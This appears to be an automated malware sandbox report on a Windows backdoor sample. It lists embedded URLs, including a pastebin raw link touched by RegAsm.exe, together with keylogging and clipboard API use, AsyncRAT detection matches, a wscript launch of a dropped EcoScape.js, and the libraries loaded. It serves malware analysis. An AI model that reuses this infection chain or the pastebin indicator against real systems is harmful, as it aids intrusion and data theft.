              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
              Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: EcoScape.pif.11.dr, Plugins.0.drString found in binary or memory: https://www.globalsign.com/repository/0

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056BB
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_004BF7C7
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_004BF55C
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,11_2_004AA635
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_004D9FD2

              System Summary

              barindex
              Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_004B4763
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_004A1B4D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_004AF20D
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0046801711_2_00468017
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0045E14411_2_0045E144
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0044E1F011_2_0044E1F0
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047A26E11_2_0047A26E
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004622A211_2_004622A2
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004422AD11_2_004422AD
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0045C62411_2_0045C624
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047E87F11_2_0047E87F
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004CC8A411_2_004CC8A4
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004B2A0511_2_004B2A05
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00476ADE11_2_00476ADE
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004A8BFF11_2_004A8BFF
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0045CD7A11_2_0045CD7A
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0046CE1011_2_0046CE10
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0047715911_2_00477159
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0044924011_2_00449240
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004D531111_2_004D5311
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_004496E011_2_004496E0
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_0046170411_2_00461704
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00461A7611_2_00461A76
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00449B6011_2_00449B60
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00467B8B11_2_00467B8B
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00461D2011_2_00461D20
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00467DBA11_2_00467DBA
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: 11_2_00461FE711_2_00461FE7
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: String function: 00460DA0 appears 46 times
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifCode function: String function: 0045FD52 appears 40 times
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
              Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeStatic PE information: invalid certificate
              Source: Northeast.0.drStatic PE information: No import functions for PE file found
              Source: Northeast.0.drStatic PE information: Data appended to the last section found
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pifSection loaded: rasadhlp.dllJump to behavior
